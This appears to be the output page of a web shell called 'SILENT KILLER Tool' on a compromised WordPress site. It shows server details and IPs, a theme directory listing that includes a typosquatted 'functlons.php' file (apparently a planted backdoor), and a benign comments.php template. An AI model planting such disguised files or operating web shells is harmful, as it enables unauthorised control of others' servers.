Current Path: > home > transcarter > public_html > wp-content > themes > archives_1753881676
Operation : Linux host59.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64 Software : Apache Server IP : 198.54.126.42 | Your IP: 216.73.216.135 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
assets | Directory | - | - | |
inc | Directory | - | - | |
template-parts | Directory | - | - | |
404.php | File | 987 bytes | July 30 2025 13:21:27. | |
README.MD | File | 8391 bytes | July 30 2025 13:21:27. | |
README.txt | File | 7187 bytes | July 30 2025 13:21:27. | |
archive.php | File | 2088 bytes | July 30 2025 13:21:27. | |
comments.php | File | 1660 bytes | July 30 2025 13:21:27. | |
error_log | File | 2149 bytes | August 06 2025 12:11:15. | |
footer.php | File | 868 bytes | July 30 2025 13:21:27. | |
functions.php | File | 12577 bytes | July 30 2025 13:21:27. | |
functlons.php | File | 229790 bytes | July 30 2025 13:21:27. | |
header.php | File | 1366 bytes | July 30 2025 13:21:27. | |
index.php | File | 1213 bytes | July 30 2025 13:21:27. | |
page.php | File | 1007 bytes | July 30 2025 13:21:27. | |
rtl.css | File | 3407 bytes | July 30 2025 13:21:27. | |
screenshot.png | File | 196508 bytes | July 30 2025 13:21:27. | |
search.php | File | 1641 bytes | July 30 2025 13:21:27. | |
sidebar.php | File | 647 bytes | July 30 2025 13:21:27. | |
single.php | File | 1059 bytes | July 30 2025 13:21:27. | |
style.css | File | 29236 bytes | July 30 2025 13:21:27. |
<?php /** * The template for displaying comments * * This is the template that displays the area of the page that contains both the current comments * and the comment form. * * @link https://codex.wordpress.org/Template_Hierarchy * * @package Highstarter * * @since 1.0 * @version 1.0 */ /* * If the current post is protected by a password and * the visitor has not yet entered the password we will * return early without loading the comments. */ if (post_password_required()) { return; } ?> <div id="comments" class="comment-content"> <?php if (have_comments()): ?> <h3 class="mb-5"> <?php printf(__('Comments', 'highstarter')); ?> </h3> <?php the_comments_navigation();?> <ul class="comment-list"> <?php wp_list_comments(array( 'style' => 'ul', 'class' => 'comment-list', 'short_ping' => true, 'avatar_size' => 70, )); ?> </ul><!-- .comment-list --> <?php the_comments_navigation();?> <?php endif; comment_form(array( 'title_reply_before' => '<h3 id="reply-title" class="comment-reply-title mb-5">', 'title_reply_after' => '</h3>', 'title_reply' => __('Leave a Comment', 'highstarter'), 'class_submit' => 'btn btn-primary', 'label_submit' => __('Submit Query', 'highstarter'), 'comment_field' => '<p class="comment-form-comment">' . '<label for="comment">' . __('Message', 'highstarter') . '</label>' . '<textarea id="comment" name="comment" class="form-control" cols="45" rows="8" aria-required="true"></textarea>' . '</p>', )); ?> </div><!-- .comments-area -->
SILENT KILLER Tool